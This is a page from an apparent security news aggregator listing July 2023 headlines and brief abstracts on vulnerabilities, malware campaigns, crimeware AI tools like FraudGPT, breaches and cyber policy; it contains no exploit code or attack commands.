Misconfigured and poorly secured Apache Tomcat servers are being targeted as part of a new campaign designed to deliver the Mirai botnet malware and cryptocurrency miners. The findings come courtesy of Aqua, which detected more than 800 attacks against its Tomcat server honeypots over a two-year time period, with 96% of the attacks linked to the Mirai botnet. Of these attack attempts, 20% (or 152) entailed the use of a web shell script dubbed "neww" that originated from 24 unique IP addresses, with 68% of them originating from a single IP address (104.248.157[.]218). "The threat actor scanned for Tomcat servers and launched a brute force attack against it, attempting to gain access to the Tomcat web application manager by trying different combinations of credentials associated with it," Aqua security researcher Nitzan Yaakov said. Upon gaining a successful foothold, the threat actors have been observed deploying a WAR file that contains a malicious web s... (The Hacker News)
July 27, 2023 – General
Two flaws in Linux Ubuntu affect 40% of Ubuntu users
Abstract
Wiz researchers discovered two Linux vulnerabilities in the Ubuntu kernel that can allow an unprivileged local user to gain elevated privileges. Wiz Research discovered two privilege escalation vulnerabilities, tracked as CVE-2023-2640 and CVE-2023-32629,... (Security Affairs)
July 27, 2023 – Malware
Introducing FraudGPT: The Latest AI Cybercrime Tool in the Dark Web
Abstract
In the wake of WormGPT's success, threat actors have now introduced another AI-powered cybercrime tool called FraudGPT. This AI bot is being promoted on numerous dark web marketplaces and Telegram channels, and is capable of designing spear-phishing emails, generating cracking tools, and facilit... (Cyware)
July 27, 2023 – Policy and Law
Group-IB Co-Founder Sentenced to 14 Years in Russian Prison for Alleged High Treason
Abstract
A city court in Moscow on Wednesday convicted Group-IB co-founder and CEO Ilya Sachkov of "high treason" and jailed him for 14 years in a "strict regime colony" over accusations of passing information to foreign spies. "The court found Sachkov guilty under Article 275 of the Russian Criminal Code (high treason) sentencing him to 14 years of incarceration in a maximum-security jail, restriction of freedom for one year and a fine of 500,000 rubles (about $5,550)," state news agency TASS reported. Sachkov, who has been in custody since September 2021 and denied wrongdoing, had been accused of handing over classified information to foreign intelligence in 2011, which the prosecutors said caused reputational damage to Russia's national interests. The exact nature of the charges is unclear. The 37-year-old is expected to appeal the decision, Bloomberg said, adding, "Sachkov was alleged to have given the U.S. government information regardin... (The Hacker News)
July 27, 2023 – Malware
Decoy Dog Malware Evolves to Expand its Reach
Abstract
An unidentified nation-state appears to be preparing for a new hacking campaign, according to researchers at Infoblox. The campaign uses the relatively new Decoy Dog malware toolkit. Decoy Dog has undergone a major upgrade from Pupy, an open-source remote access tool, to disguise its activities... (Cyware)
July 27, 2023 – Policy and Law
New SEC Rules Require U.S. Companies to Reveal Cyber Attacks Within 4 Days
Abstract
The U.S. Securities and Exchange Commission (SEC) on Wednesday approved new rules that require publicly traded companies to publicize details of a cyber attack within four days of identifying that it has a "material" impact on their finances, marking a major shift in how computer breaches are disclosed. "Whether a company loses a factory in a fire — or millions of files in a cybersecurity incident — it may be material to investors," SEC chair Gary Gensler said. "Currently, many public companies provide cybersecurity disclosure to investors. I think companies and investors alike, however, would benefit if this disclosure were made in a more consistent, comparable, and decision-useful way." To that end, the new obligations mandate that companies reveal the incident's nature, scope, and timing, as well as its impact. This disclosure, however, may be delayed by an additional period of up to 60 days should it be determined that giving out such specific... (The Hacker News)
July 27, 2023 – Government
DOJ Reorganizes Units to Better Fight Ransomware
Abstract
The U.S. Justice Department is merging its National Cryptocurrency Enforcement Team with its Crime and Intellectual Property Section to strengthen its capabilities in investigating cryptocurrency-related criminal cases and cybercrime. (Cyware)
July 26, 2023 – Business
Protect AI Raises $35M to Build a Suite of AI-Defending Tools
Abstract
Protect AI announced that it raised $35 million in a Series A round led by Evolution Equity Partners with participation from Salesforce Ventures, Acrew Capital, boldstart ventures, Knollwood Capital and Pelion Ventures. (Cyware)
July 26, 2023 – Malware
Decoy Dog: New Breed of Malware Posing Serious Threats to Enterprise Networks
Abstract
A deeper analysis of a recently discovered malware called Decoy Dog has revealed that it's a significant upgrade over the Pupy RAT, an open-source remote access trojan it's modeled on. "Decoy Dog has a full suite of powerful, previously unknown capabilities – including the ability to move victims to another controller, allowing them to maintain communication with compromised machines and remain hidden for long periods of time," Infoblox said in a Tuesday report. "Some victims have actively communicated with a Decoy Dog server for over a year." Other new features allow the malware to execute arbitrary Java code on the client and connect to emergency controllers using a mechanism that's similar to a traditional DNS domain generation algorithm (DGA), with the Decoy Dog domains engineered to respond to replayed DNS queries from breached clients. The sophisticated toolkit was first discovered by the cybersecurity firm in early April 2023 after... (The Hacker News)
July 26, 2023 – Outage
Two ambulance services in UK lost access to patient records after a cyber attack on software provider
Abstract
Swedish software firm Ortivus suffered a cyberattack that has resulted in at least two British ambulance services losing access to electronic patient records. Two British ambulance services were not able to access electronic patient records after... (Security Affairs)
July 26, 2023 – Outage
UK Ambulance Services Disrupted by Infosec Fiends
Abstract
Several UK NHS ambulance organizations have been struggling to record patient data and pass it to other providers following a cyberattack aimed at health software company Ortivus. (Cyware)
July 26, 2023 – General
The Alarming Rise of Infostealers: How to Detect this Silent Threat
Abstract
A new study conducted by Uptycs has uncovered a stark increase in the distribution of information stealing (a.k.a. infostealer or stealer) malware. Incidents have more than doubled in Q1 2023, indicating an alarming trend that threatens global organizations. According to the new Uptycs whitepaper, Stealers are Organization Killers, a variety of new info stealers have emerged this year, preying on Windows, Linux, and macOS systems. Telegram has notably been used extensively by these malware authors for command, control, and data exfiltration. What is a stealer? A stealer is a type of malware that targets its victim by stealing sensitive information that can include passwords, login credentials, and other personal data. After collecting such data, the stealer sends it to the threat actor's command and control (C2) system. RedLine and Vidar, two well-known stealers, took advantage of log-providing services to infiltrate private systems. RedLine primarily targets credenti... (The Hacker News)
July 26, 2023 – Malware
FraudGPT, a new malicious generative AI tool appears in the threat landscape
Abstract
FraudGPT is another cybercrime generative artificial intelligence (AI) tool that is advertised in the hacking underground. Generative AI models are becoming attractive for crooks; Netenrich researchers recently spotted a new platform dubbed FraudGPT... (Security Affairs)
July 26, 2023 – Government
To Execute the National Cyber Strategy, It’s Going to Take the Whole US Government
Abstract
The implementation plan for the national cybersecurity strategy assigns specific tasks and responsibilities to various government agencies, highlighting the need for coordination and collaboration. (Cyware)
July 26, 2023 – Criminals
Fenix Cybercrime Group Poses as Tax Authorities to Target Latin American Users
Abstract
Tax-paying individuals in Mexico and Chile have been targeted by a Mexico-based cybercrime group that goes by the name Fenix to breach targeted networks and steal valuable data. A key hallmark of the operation entails cloning official portals of the Servicio de Administración Tributaria (SAT) in Mexico and the Servicio de Impuestos Internos (SII) in Chile and redirecting potential victims to those sites. "These fake websites prompt users to download a supposed security tool, claiming it will enhance their portal navigation safety," Metabase Q security researchers Gerardo Corona and Julio Vidal said in a recent analysis. "However, unbeknownst to the victims, this download actually installs the initial stage of malware, ultimately enabling the theft of sensitive information such as credentials." The goal of Fenix, according to the Latin America-focused cybersecurity firm, is to act as an initial access broker and get a foothold into different companies in t... (The Hacker News)
July 26, 2023 – Government
CISA adds Ivanti EPMM flaw to its Known Exploited Vulnerabilities catalog
Abstract
US CISA added an actively exploited Ivanti Endpoint Manager Mobile (EPMM) vulnerability to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added an actively exploited Ivanti Endpoint Manager... (Security Affairs)
July 26, 2023 – Criminals
FraudGPT: The Villain Avatar of ChatGPT
Abstract
Cybercriminals are using artificial intelligence tools like FraudGPT to create sophisticated phishing attacks and other malicious activities, posing a significant threat to organizations. (Cyware)
July 26, 2023 – Malware
New AI Tool ‘FraudGPT’ Emerges, Tailored for Sophisticated Attacks
Abstract
Following the footsteps of WormGPT, threat actors are advertising yet another cybercrime generative artificial intelligence (AI) tool dubbed FraudGPT on various dark web marketplaces and Telegram channels. "This is an AI bot, exclusively targeted for offensive purposes, such as crafting spear phishing emails, creating cracking tools, carding, etc.," Netenrich security researcher Rakesh Krishnan said in a report published Tuesday. The cybersecurity firm said the offering has been circulating since at least July 22, 2023, for a subscription cost of $200 a month (or $1,000 for six months and $1,700 for a year). "If your [sic] looking for a Chat GPT alternative designed to provide a wide range of exclusive tools, features, and capabilities tailored to anyone's individuals with no boundaries then look no further!," claims the actor, who goes by the online alias CanadianKingpin. The author also states that the tool could be used to write malicious code, c... (The Hacker News)
July 26, 2023 – Vulnerabilities
Over 500K MikroTik RouterOS systems potentially exposed to hacking due to critical flaw
Abstract
Experts warn of a severe privilege escalation, tracked as CVE-2023-30799, in MikroTik RouterOS that can be exploited to hack vulnerable devices. VulnCheck researchers warn of a critical vulnerability, tracked as CVE-2023-30799 (CVSS score:... (Security Affairs)
July 26, 2023 – Policy and Law
Federal Privacy Bill Would Strip FCC’s Role as Telecom Industry’s Privacy Cop
Abstract
Sweeping federal privacy legislation now under debate in Congress is expected to move oversight of the telecom industry’s privacy practices from the FCC to the FTC, a shift that has long been a priority for telecom companies. (Cyware)
July 26, 2023 – Malware
Rust-based Realst Infostealer Targeting Apple macOS Users’ Cryptocurrency Wallets
Abstract
A new malware family called Realst has become the latest to target Apple macOS systems, with a third of the samples already designed to infect macOS 14 Sonoma, the upcoming major release of the operating system. Written in the Rust programming language, the malware is distributed in the form of bogus blockchain games and is capable of "emptying crypto wallets and stealing stored password and browser data" from both Windows and macOS machines. Realst was first discovered in the wild by security researcher iamdeadlyz. "Realst Infostealer is distributed via malicious websites advertising fake blockchain games with names such as Brawl Earth, WildWorld, Dawnland, Destruction, Evolion, Pearl, Olymp of Reptiles, and SaintLegend," SentinelOne security researcher Phil Stokes said in a report. "Each version of the fake blockchain game is hosted on its own website complete with associated Twitter and Discord accounts." The cybersecurity firm, which identif... (The Hacker News)
July 26, 2023 – General
Supply Chain, Open Source Pose Major Challenge to AI Systems
Abstract
Supply chain compromise, open source technology, and rapid advances in artificial intelligence capabilities pose significant challenges to safeguarding AI, experts told a Senate panel Tuesday. (Cyware)
July 26, 2023 – Vulnerabilities
Critical MikroTik RouterOS Vulnerability Exposes Over Half a Million Devices to Hacking
Abstract
A severe privilege escalation issue impacting MikroTik RouterOS could be weaponized by remote malicious actors to execute arbitrary code and seize full control of vulnerable devices. Cataloged as CVE-2023-30799 (CVSS score: 9.1), the shortcoming is expected to put approximately 500,000 and 900,000 RouterOS systems at risk of exploitation via their web and/or Winbox interfaces, respectively, VulnCheck disclosed in a Tuesday report. "CVE-2023-30799 does require authentication," security researcher Jacob Baines said. "In fact, the vulnerability itself is a simple privilege escalation from admin to 'super-admin' which results in access to an arbitrary function. Acquiring credentials to RouterOS systems is easier than one might expect." This is because the MikroTik RouterOS operating system does not offer any protection against password brute-force attacks and ships with a well-known default "admin" user, with its password being an empty string... (The Hacker News)
July 26, 2023 – Malware
New Realst Info-stealer Targets MacOS, Empties Crypto Wallets
Abstract
In the ever-evolving information-stealer landscape, a new malware dubbed Realst has emerged. Realst is designed to target macOS systems and is capable of emptying crypto wallets and stealing stored passwords and browser data. Attackers are using tricks to lure gamers with money, which is a red... (Cyware)
July 25, 2023 – Malware
Spyhide Stalkerware is Spying on Tens of Thousands of Phones
Abstract
Spyhide is secretly collecting private data from tens of thousands of Android devices worldwide. The app is often installed on a victim's phone by someone who knows their passcode, and it remains hidden on the home screen. (Cyware)
July 25, 2023
North Korean Nation-State Actors Exposed in JumpCloud Hack After OPSEC Blunder
Abstract
North Korean nation-state actors affiliated with the Reconnaissance General Bureau (RGB) have been attributed to the JumpCloud hack following an operational security (OPSEC) blunder that exposed their actual IP address. Google-owned threat intelligence firm Mandiant attributed the activity to a threat actor it tracks under the name UNC4899, which likely shares overlaps with clusters already being monitored as Jade Sleet and TraderTraitor, a group with a history of striking blockchain and cryptocurrency sectors. UNC4899 also overlaps with APT43, another hacking crew associated with the Democratic People's Republic of Korea (DPRK) that was unmasked earlier this March as conducting a series of campaigns to gather intelligence and siphon cryptocurrency from targeted companies. The adversarial collective's modus operandi is characterized by the use of Operational Relay Boxes (ORBs) using L2TP IPsec tunnels along with commercial VPN providers to disguise the attacker's... (The Hacker News)
July 25, 2023 – Vulnerabilities
Atlassian addressed 3 flaws in Confluence and Bamboo products
Abstract
Atlassian addressed three vulnerabilities in its Confluence Server, Data Center, and Bamboo Data Center products that can lead to remote code execution. Atlassian has addressed three critical and high severity vulnerabilities impacting... (Security Affairs)
July 25, 2023 – Business
Thales Acquiring Imperva From Thoma Bravo for $3.6 Billion
Abstract
Thales will buy Imperva for an enterprise value of $3.6 billion ($3.7 billion gross value minus $0.1 billion tax benefits). The transaction is expected to close by the beginning of 2024. (Cyware)
July 25, 2023 – Malware
Casbaneiro Banking Malware Goes Under the Radar with UAC Bypass Technique Full Text
Abstract
The financially motivated threat actors behind the Casbaneiro banking malware family have been observed making use of a User Account Control ( UAC ) bypass technique to gain full administrative privileges on a machine, a sign that the threat actor is evolving their tactics to avoid detection and execute malicious code on compromised assets. "They are still heavily focused on Latin American financial institutions, but the changes in their techniques represent a significant risk to multi-regional financial organizations as well," Sygnia said in a statement shared with The Hacker News. Casbaneiro , also known as Metamorfo and Ponteiro, is best known for its banking trojan, which first emerged in mass email spam campaigns targeting the Latin American financial sector in 2018. Infection chains typically begin with a phishing email pointing to a booby-trapped attachment that, when launched, activates a series of steps that culminate in the deployment of the banking malwareThe Hacker News
July 25, 2023 – Vulnerabilities
VMware addressed an information disclosure flaw in VMware Tanzu Application Service for VMs and Isolation Segment Full Text
Abstract
VMware fixed an information disclosure flaw in VMware Tanzu Application Service for VMs and Isolation Segment that exposed CF API admin credentials in audit logs. VMware has addressed an information disclosure vulnerability, tracked as CVE-2023-20891...Security Affairs
July 25, 2023
Chinese Cyberespionage Group APT31 Targets Eastern European Entities Full Text
Abstract
A China-linked group APT31 (aka Zirconium) has been linked to a cyberespionage campaign targeting industrial organizations in Eastern Europe. The attackers abused DLL hijacking vulnerabilities in cloud-based data storage systems such as Dropbox or Yandex, as well as a temporary file-sharing serv ...Cyware
July 25, 2023 – General
macOS Under Attack: Examining the Growing Threat and User Perspectives Full Text
Abstract
As the number of people using macOS keeps going up, so does the desire of hackers to take advantage of flaws in Apple's operating system. What Are the Rising Threats to macOS? There is a common misconception among macOS fans that Apple devices are immune to hacking and malware infection. However, users have been facing more and more dangers recently. Inventive attackers are specifically targeting Mac systems, as seen with the "Geacon" Cobalt Strike tool attack. This tool enables them to perform malicious actions such as data theft, privilege elevation, and remote device control, placing the security and privacy of Mac users at grave risk. Earlier this year, researchers also uncovered the MacStealer malware, which also stole sensitive data from Apple users. Documents, iCloud keychain data, browser cookies, credit card credentials – nothing is safe from the prying eyes. But that's not all. CloudMensis is malicious software that specifically targets macOS systems,The Hacker News
July 25, 2023 – Vulnerabilities
Apple addressed a new actively exploited zero-day tracked as CVE-2023-38606 Full Text
Abstract
Apple released security updates to address an actively exploited zero-day flaw in iOS, iPadOS, macOS, tvOS, watchOS, and Safari. Apple released urgent security updates to address multiple flaws in iOS, iPadOS, macOS, tvOS, watchOS, and Safari, including...Security Affairs
July 25, 2023 – General
RaaS proliferation: 14 new ransomware groups target organizations worldwide Full Text
Abstract
In the second quarter of 2023, GuidePoint Research and Intelligence Team (GRIT) tracked 1,177 total publicly posted ransomware victims claimed by 41 different threat groups.Cyware
July 25, 2023 – Vulnerabilities
TETRA:BURST — 5 New Vulnerabilities Exposed in Widely Used Radio Communication System Full Text
Abstract
A set of five security vulnerabilities have been disclosed in the Terrestrial Trunked Radio (TETRA) standard for radio communication used widely by government entities and critical infrastructure sectors, including what's believed to be an intentional backdoor that could have potentially exposed sensitive information. The issues, discovered by Midnight Blue in 2021 and held back until now, have been collectively called TETRA:BURST. There is no conclusive evidence to determine that the vulnerabilities have been exploited in the wild to date. "Depending on infrastructure and device configurations, these vulnerabilities allow for real time decryption, harvest-now-decrypt-later attacks, message injection, user deanonymization, or session key pinning," the Netherlands-based cybersecurity company said. Standardized by the European Telecommunications Standards Institute (ETSI) in 1995, TETRA is used in more than 100 countries and as a police radio communication systemThe Hacker News
July 25, 2023 – Attack
Twelve Norwegian ministries were hacked using a zero-day vulnerability Full Text
Abstract
Threat actors exploited a zero-day flaw in third-party software in attacks against the ICT platform used by 12 Norwegian ministries. The ICT platform used by twelve ministries of the Norwegian government was hacked, and threat actors have exploited...Security Affairs
July 25, 2023 – Education
How MDR Helps Solve the Cybersecurity Talent Gap Full Text
Abstract
How do you overcome today's talent gap in cybersecurity? This is a crucial issue — particularly when you find executive leadership or the board asking pointed questions about your security team's ability to defend the organization against new and current threats. This is why many security leaders find themselves turning to managed security services like MDR ( managed detection and response ), which can offer an immediate solution. The right MDR partner can act as an extension of your existing team, while offering a fast and budget-friendly option for uplevelling security at organizations of virtually any size. Here's a look at common staffing challenges that MDR helps solve: Overcoming Cybersecurity Talent Challenges From stopping ransomware to securing the attack surface of the environment, most security teams have more to do than they can manage. This leads to security gaps that increase both cyber risk and frustration for stakeholders across the business. The challThe Hacker News
July 25, 2023 – Vulnerabilities
Zenbleed: New Flaw in AMD Zen 2 Processors Puts Encryption Keys and Passwords at Risk Full Text
Abstract
A new security vulnerability has been discovered in AMD's Zen 2 architecture-based processors that could be exploited to extract sensitive data such as encryption keys and passwords. Discovered by Google Project Zero researcher Tavis Ormandy, the flaw – codenamed Zenbleed and tracked as CVE-2023-20593 (CVSS score: 6.5) – allows data exfiltration at the rate of 30 kb per core, per second. The issue is part of a broader category of weaknesses called speculative execution attacks, in which the optimization technique widely used in modern CPUs is abused to access cryptographic keys from CPU registers. "Under specific microarchitectural circumstances, a register in 'Zen 2' CPUs may not be written to 0 correctly," AMD explained in an advisory. "This may cause data from another process and/or thread to be stored in the YMM register, which may allow an attacker to potentially access sensitive information." Web infrastructure company Cloudflare noteThe Hacker News
July 25, 2023 – Vulnerabilities
Atlassian Releases Patches for Critical Flaws in Confluence and Bamboo Full Text
Abstract
Atlassian has released updates to address three security flaws impacting its Confluence Server, Data Center, and Bamboo Data Center products that, if successfully exploited, could result in remote code execution on susceptible systems. The list of the flaws is below - CVE-2023-22505 (CVSS score: 8.0) - RCE (Remote Code Execution) in Confluence Data Center and Server (Fixed in versions 8.3.2 and 8.4.0) CVE-2023-22508 (CVSS score: 8.5) - RCE (Remote Code Execution) in Confluence Data Center and Server (Fixed in versions 7.19.8 and 8.2.0) CVE-2023-22506 (CVSS score: 7.5) - Injection, RCE (Remote Code Execution) in Bamboo (Fixed in versions 9.2.3 and 9.3.1) CVE-2023-22505 and CVE-2023-22508 allow an "authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and no user interaction," the company said. While the first bug was introduced in version 8.0.0, CVE-2023-22508 was introducThe Hacker News
July 25, 2023 – Vulnerabilities
Ivanti Releases Urgent Patch for EPMM Zero-Day Vulnerability Under Active Exploitation Full Text
Abstract
Ivanti is warning users to update their Endpoint Manager Mobile (EPMM) mobile device management software (formerly MobileIron Core) to the latest version that fixes an actively exploited zero-day vulnerability. Dubbed CVE-2023-35078, the issue has been described as a remote unauthenticated API access vulnerability that impacts currently supported version 11.4 releases 11.10, 11.9, and 11.8 as well as older releases. It has the maximum severity rating of 10 on the CVSS scale. "An authentication bypass vulnerability in Ivanti EPMM allows unauthorized users to access restricted functionality or resources of the application without proper authentication," the company said in a terse advisory. "If exploited, this vulnerability enables an unauthorized, remote (internet-facing) actor to potentially access users' personally identifiable information and make limited changes to the server." The U.S. Cybersecurity and Infrastructure Security Agency (CISA) said anThe Hacker News
July 25, 2023 – Vulnerabilities
Apple Rolls Out Urgent Patches for Zero-Day Flaws Impacting iPhones, iPads and Macs Full Text
Abstract
Apple has rolled out security updates to iOS, iPadOS, macOS, tvOS, watchOS, and Safari to address several security vulnerabilities, including one zero-day bug actively exploited in the wild. Tracked as CVE-2023-38606, the shortcoming resides in the kernel and could permit a malicious app to modify sensitive kernel state. The company said it was addressed with improved state management. "Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1," the tech giant noted in its advisory. It's worth noting that CVE-2023-38606 is the third security vulnerability discovered in connection with Operation Triangulation, a sophisticated mobile cyber espionage campaign targeting iOS devices since 2019 using a zero-click exploit chain. The other two zero-days, CVE-2023-32434 and CVE-2023-32435, were patched by Apple last month. Kaspersky researchers Valentin Pashkov, Mikhail Vinogradov, Georgy KucThe Hacker News
July 24, 2023 – Vulnerabilities
Atlassian Patches Remote Code Execution Vulnerabilities in Confluence, Bamboo Full Text
Abstract
The most severe of these issues, tracked as CVE-2023-22508 (CVSS score of 8.5), was introduced in Confluence version 7.4.0. The second bug, tracked as CVE-2023-22505 (CVSS score of 8.0), was introduced in Confluence version 8.0.0.Cyware
July 24, 2023 – Vulnerabilities
Critical Zero-Days in Atera Windows Installers Expose Users to Privilege Escalation Attacks Full Text
Abstract
Zero-day vulnerabilities in Windows Installers for the Atera remote monitoring and management software could act as a springboard to launch privilege escalation attacks. The flaws, discovered by Mandiant on February 28, 2023, have been assigned the identifiers CVE-2023-26077 and CVE-2023-26078, with the issues remediated in versions 1.8.3.7 and 1.8.4.9 released by Atera on April 17, 2023, and June 26, 2023, respectively. "The ability to initiate an operation from a NT AUTHORITY\SYSTEM context can present potential security risks if not properly managed," security researcher Andrew Oliveau said. "For instance, misconfigured Custom Actions running as NT AUTHORITY\SYSTEM can be exploited by attackers to execute local privilege escalation attacks." Successful exploitation of such weaknesses could pave the way for the execution of arbitrary code with elevated privileges. Both the flaws reside in the MSI installer's repair functionality, potentially creaThe Hacker News
July 24, 2023 – Vulnerabilities
A flaw in OpenSSH forwarded ssh-agent allows remote code execution Full Text
Abstract
A new flaw in OpenSSH could be potentially exploited to run arbitrary commands remotely on compromised hosts under specific conditions. Researchers from the Qualys Threat Research Unit (TRU) have discovered a remote code execution vulnerability in OpenSSH’s...Security Affairs
July 24, 2023
Lazarus Targets Windows IIS Web Servers for Malware Distribution Full Text
Abstract
ASEC discovered that the North Korean state-sponsored Lazarus APT group is attacking Windows Internet Information Service (IIS) web servers and using them to distribute malware. It is imperative for organizations to adopt stringent measures, including attack surface management, to identify expo ...Cyware
July 24, 2023 – Solution
Google Messages Getting Cross-Platform End-to-End Encryption with MLS Protocol Full Text
Abstract
Google has announced that it intends to add support for Message Layer Security (MLS) to its Messages service for Android and open source implementation of the specification. "Most modern consumer messaging platforms (including Google Messages) support end-to-end encryption, but users today are limited to communicating with contacts who use the same platform," Giles Hogben, privacy engineering director at Google, said. "This is why Google is strongly supportive of regulatory efforts that require interoperability for large end-to-end messaging platforms." The development comes as the Internet Engineering Task Force (IETF) released the core specification of the Messaging Layer Security (MLS) protocol as a Request for Comments (RFC 9420). Some of the other major companies that have thrown their weight behind the protocol are Amazon Web Services (AWS) Wickr, Cisco, Cloudflare, The Matrix.org Foundation, Mozilla, Phoenix R&D, and Wire. Notably missing fromThe Hacker News
July 24, 2023 – General
Experts warn of OSS supply chain attacks against the banking sector Full Text
Abstract
Checkmarx researchers have uncovered the first known targeted OSS supply chain attacks against the banking sector. In the first half of 2023, Checkmarx researchers detected multiple open-source software supply chain attacks aimed at the banking sector....Security Affairs
July 24, 2023 – Vulnerabilities
Over 20,000 Citrix Appliances Vulnerable to New Exploit Full Text
Abstract
A new exploit technique targeting a recent Citrix Application Delivery Controller (ADC) and Gateway vulnerability can be used against thousands of unpatched devices, cybersecurity firm Bishop Fox claims.Cyware
July 24, 2023 – Education
How to Protect Patients and Their Privacy in Your SaaS Apps Full Text
Abstract
The healthcare industry is under a constant barrage of cyberattacks. It has traditionally been one of the most frequently targeted industries, and things haven't changed in 2023. The U.S. Government's Office for Civil Rights reported 145 data breaches in the United States during the first quarter of this year. That follows 707 incidents a year ago, during which over 50 million records were stolen. Health records often include names, birth dates, social security numbers, and addresses. This treasure trove of data is used in identity theft, tax fraud, and other crimes. It is the high value of the data that makes healthcare applications such a promising target. The healthcare industry was hesitant to adopt SaaS applications. However, SaaS applications lead to better collaboration among medical professionals, leading to improved patient outcomes. That, combined with SaaS's ability to reduce costs and improve financial performance, has led to the industry fully embracing SaaS solutionsThe Hacker News
July 24, 2023 – Privacy
Apple could opt to stop iMessage and FaceTime services due to the government’s surveillance demands Full Text
Abstract
Apple could opt to pull iMessage and FaceTime services in the U.K. in response to the government's surveillance demands. In light of the government's surveillance demands, Apple might consider withdrawing iMessage and FaceTime services from the U.K. The...Security Affairs
July 24, 2023 – General
Banking Sector Witnesses First-Ever OSS Supply Chain Attack Full Text
Abstract
For the first time, the banking sector has been explicitly targeted by two distinct Open-Source Software (OSS) supply chain attacks that enabled attackers to stealthily overlay the banking sites. Organizations must equip themselves with the best early threat alerting and sharing platforms that c ...Cyware
July 24, 2023 – Vulnerabilities
New OpenSSH Vulnerability Exposes Linux Systems to Remote Command Injection Full Text
Abstract
Details have emerged about a now-patched flaw in OpenSSH that could be potentially exploited to run arbitrary commands remotely on compromised hosts under specific conditions. "This vulnerability allows a remote attacker to potentially execute arbitrary commands on vulnerable OpenSSH's forwarded ssh-agent," Saeed Abbasi, manager of vulnerability research at Qualys, said in an analysis last week. The vulnerability is being tracked under the CVE identifier CVE-2023-38408 (CVSS score: N/A). It impacts all versions of OpenSSH before 9.3p2. OpenSSH is a popular connectivity tool for remote login with the SSH protocol that's used for encrypting all traffic to eliminate eavesdropping, connection hijacking, and other attacks. Successful exploitation requires the presence of certain libraries on the victim system and that the SSH authentication agent is forwarded to an attacker-controlled system. SSH agent is a background program that maintains users' keysThe Hacker News
July 24, 2023 – Attack
Norwegian Government Security and Service Organisation Hit by Cyberattack Full Text
Abstract
Twelve Norwegian government ministries have been hit by a cyberattack, the Norwegian government said on Monday, the latest attack to hit the public sector of Europe's largest gas supplier and NATO's northernmost member.Cyware
July 24, 2023 – Attack
Banking Sector Targeted in Open-Source Software Supply Chain Attacks Full Text
Abstract
Cybersecurity researchers said they have discovered what they say are the first open-source software supply chain attacks specifically targeting the banking sector. "These attacks showcased advanced techniques, including targeting specific components in web assets of the victim bank by attaching malicious functionalities to it," Checkmarx said in a report published last week. "The attackers employed deceptive tactics such as creating a fake LinkedIn profile to appear credible and customized command-and-control (C2) centers for each target, exploiting legitimate services for illicit activities." The npm packages have since been reported and taken down. The names of the packages were not disclosed. In the first attack, the malware author is said to have uploaded a couple of packages to the npm registry in early April 2023 by posing as an employee of the target bank. The modules came with a preinstall script to activate the infection sequence. To complete the rusThe Hacker News
July 24, 2023 – Vulnerabilities
Perimeter81 Vulnerability Disclosed After Botched Disclosure Process Full Text
Abstract
Cybersecurity researcher Erhad Husovic published a blog post in late June to disclose the details of a local privilege escalation vulnerability discovered in Perimeter81’s macOS application.Cyware
July 24, 2023 – General
CISOs are making cybersecurity a business problem Full Text
Abstract
U.S. enterprises are responding to growing cybersecurity threats by working to make the best use of tools and services to ensure business resilience, according to an ISG report.Cyware
July 24, 2023 – Attack
First Known Targeted OSS Supply Chain Attacks Against the Banking Sector Full Text
Abstract
The attackers employed deceptive tactics such as creating fake LinkedIn profiles to appear credible and using customized command and control (C2) centers for each target, exploiting legitimate services for illicit activities.Cyware
July 23, 2023 – General
Security Affairs newsletter Round 429 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Multiple...Security Affairs
July 23, 2023 – Vulnerabilities
Shadowserver reported that +15K Citrix servers are likely vulnerable to attacks exploiting the flaw CVE-2023-3519 Full Text
Abstract
Researchers reported that more than 15000 Citrix servers exposed online are likely vulnerable to attacks exploiting the vulnerability CVE-2023-3519. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week warned of cyber attacks...Security Affairs
July 22, 2023 – Botnet
Multiple DDoS botnets were observed targeting Zyxel devices Full Text
Abstract
Researchers warn of several DDoS botnets exploiting a critical flaw tracked as CVE-2023-28771 in Zyxel devices. Fortinet FortiGuard Labs researchers warned of multiple DDoS botnets exploiting a vulnerability impacting multiple Zyxel firewalls. The...Security Affairs
July 22, 2023 – Breach
Global CDN Service ‘jsdelivr’ Exposed Users to Phishing Attacks Full Text
Abstract
The malicious NPM package, which masqueraded as a legitimate alternative to a popular package, downloaded a phishing HTML code from the jsdelivr CDN service to steal users' credentials.Cyware
July 22, 2023 – Privacy
Apple Threatens to Pull iMessage and FaceTime from U.K. Amid Surveillance Demands Full Text
Abstract
Apple has warned that it would rather stop offering iMessage and FaceTime services in the U.K. than bow down to government pressure in response to new proposals that seek to expand digital surveillance powers available to state intelligence agencies. The development, first reported by BBC News, makes the iPhone maker the latest to join the chorus of voices protesting against forthcoming legislative changes to the Investigatory Powers Act (IPA) 2016 in a manner that would effectively render encryption protections ineffective. Specifically, the Online Safety Bill requires companies to install technology to scan for child sex exploitation and abuse (CSEA) material and terrorism content in encrypted messaging apps and other services. It also mandates that messaging services clear security features with the Home Office before releasing them and take immediate action to disable them if required without informing the public. While the fact does not explicitly call out for the rThe Hacker News
July 22, 2023 – Breach
DHL Investigating MOVEit Breach as Number of Victims Surpasses 20 Million Full Text
Abstract
The United Kingdom arm of shipping giant DHL said it is investigating a data breach sourced back to its use of the MOVEit software, which has been exploited by a Russia-based ransomware group for nearly two months.Cyware
July 22, 2023 – Outage
Coastal Mississippi County Recovering From Ransomware Attack Full Text
Abstract
The local government in George County, Mississippi, was thrown into chaos this weekend when ransomware actors used a discreet phishing email to gain deep access to the county’s systems.Cyware
July 21, 2023 – Government
CISA warns of attacks against Citrix NetScaler ADC and Gateway Devices Full Text
Abstract
The US CISA warns of cyber attacks targeting Citrix NetScaler Application Delivery Controller (ADC) and Gateway devices. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of cyber attacks against Citrix NetScaler Application...Security Affairs
July 21, 2023 – Attack
Azure AD Token Forging Technique in Microsoft Attack Extends Beyond Outlook, Wiz Reports Full Text
Abstract
